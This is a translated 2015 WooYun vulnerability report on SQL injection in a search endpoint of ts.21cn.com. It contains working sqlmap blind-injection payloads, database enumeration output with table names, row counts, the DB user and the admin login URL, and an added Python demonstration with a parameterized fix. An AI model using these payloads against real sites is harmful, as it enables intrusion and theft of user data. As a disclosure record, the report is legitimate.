
SQL injection vulnerability in a 世纪龙 site

ID: 112852
URL: http://www.wooyun.org/bug.php?action=view&id=112852
Status: confirmed by vendor
Title: SQL injection vulnerability in a 世纪龙 site
Type: SQL injection
Vendor: 世纪龙信息网络有限责任公司
Reporter (white hat): 紫霞仙子
Submitted: 2015-05-08 16:27:00
Published: 2015-06-22 17:26:00
Fix time: (not set)
Confirmed: 2015-05-08 00:00:00
Confirm spend: 0
Tags: admin backend exposed to the internet; MySQL; injection technique
Followers: 0
Favorites: 0
White-hat rating: self-assessed rank 15
Vendor rating: rank 15
Summary
233
Details

http://ts.21cn.com/Home/so (POST)
channelId=41&keywords=1&view=/article/article/search

POC

---
Parameter: keywords (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: channelId=41&keywords=1') AND 8761=8761 AND ('hILz' LIKE 'hILz&view=/article/article/search
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: channelId=41&keywords=1') AND (SELECT * FROM (SELECT(SLEEP(5)))AaoW) AND ('hnji' LIKE 'hnji&view=/article/article/search
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
database management system users [1]:
[*] 'jtsuser'@'59.36.102.149'
available databases [2]:
[*] information_schema
[*] jutousu
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 73834 |
| iic_reply | 43953 |
| iic_digg | 41251 |
| iic_log | 32647 |
| iic_post_sync | 15150 |
| iic_user_addres | 14712 |
| iic_digg_20131224 | 13041 |
| iic_post | 12630 |
| iic_post_com | 8575 |
| iic_reply_sync | 6180 |
| iic_area | 3407 |
| iic_collective_digg | 1831 |
| iic_access | 917 |
| iic_com | 753 |
| iic_recom | 641 |
| iic_collective_reply | 591 |
| iic_case | 586 |
| iic_merchant | 350 |
| iic_node | 271 |
| iic_captcha | 226 |
| iic_ipadmin | 96 |
| iic_feedback | 93 |
| iic_movice | 87 |
| iic_redblackdigg | 73 |
| iic_collective | 70 |
| iic_postkeyword | 66 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_hotpost | 42 |
| iic_role_account | 39 |
| iic_team | 37 |
| iic_collectivenews | 33 |
| iic_wxuser | 32 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 24 |
| iic_redblacklist | 24 |
| iic_article | 13 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_keyword | 7 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_post_dealwith_satisfaction | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+
Database: jutousu
Table: iic_admin
[8 entries]
Admin panel URL: http://ts.21cn.com/admin/login
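As an added defensive illustration (not part of the original report): the boolean-based payload above closes a quoted LIKE pattern with `')` and re-balances it with `'hILz' LIKE 'hILz`, which only works if the keyword is spliced into the SQL text. The query shape and the sample rows below are assumptions reconstructed from that payload, and SQLite stands in for MySQL, so only the boolean-based case is reproduced (SLEEP has no SQLite equivalent).

```python
import sqlite3

# Constructed sample data standing in for the site's searchable table.
SAMPLE_TITLES = ["complaint 1", "complaint 2", "other topic"]

# The two payload shapes from the sqlmap output: one true condition, one false.
TRUE_PAYLOAD = "1') AND 8761=8761 AND ('hILz' LIKE 'hILz"
FALSE_PAYLOAD = "1') AND 8761=8762 AND ('hILz' LIKE 'hILz"


def _connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO article (title) VALUES (?)",
                     [(t,) for t in SAMPLE_TITLES])
    return conn


def search_vulnerable(keywords: str) -> int:
    """Assumed shape of the affected query: the keyword is concatenated
    into a parenthesised LIKE pattern, so "')" ends the pattern and the
    rest of the input becomes SQL. Returns the number of matching rows."""
    conn = _connect()
    sql = "SELECT id FROM article WHERE title LIKE ('%" + keywords + "%')"
    # e.g. ... LIKE ('%1') AND 8761=8761 AND ('hILz' LIKE 'hILz%')
    return len(conn.execute(sql).fetchall())


def search_safe(keywords: str) -> int:
    """Same search with a bound parameter: the whole input is one string
    value, so quotes inside it can never terminate the pattern."""
    conn = _connect()
    sql = "SELECT id FROM article WHERE title LIKE ?"
    return len(conn.execute(sql, ("%" + keywords + "%",)).fetchall())


if __name__ == "__main__":
    # Blind inference works when the true payload matches the baseline
    # response and the false payload differs from it.
    base = search_vulnerable("1")
    print("vulnerable:", base, search_vulnerable(TRUE_PAYLOAD),
          search_vulnerable(FALSE_PAYLOAD))
    # With binding, both payloads are literal text and match nothing.
    print("safe:", search_safe("1"), search_safe(TRUE_PAYLOAD),
          search_safe(FALSE_PAYLOAD))
```

A defender reproducing the finding can use the same baseline-versus-payload comparison as a regression check after deploying the parameterized query.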

Fix recommendation

~~

Status history:
2015-05-08: details sent to the vendor, awaiting vendor response
2015-05-08: vendor confirmed; details disclosed to the vendor only
2015-05-18: details disclosed to core white hats and domain experts
2015-05-28: details disclosed to regular white hats
2015-06-07: details disclosed to intern white hats
2015-06-22: details disclosed to the public
Vendor reply: Thank you for your attention to the security of our business. Based on your report, the issue is being handled.
Response: severity: High; vulnerability rank: 15; confirmed: 2015-05-08 17:26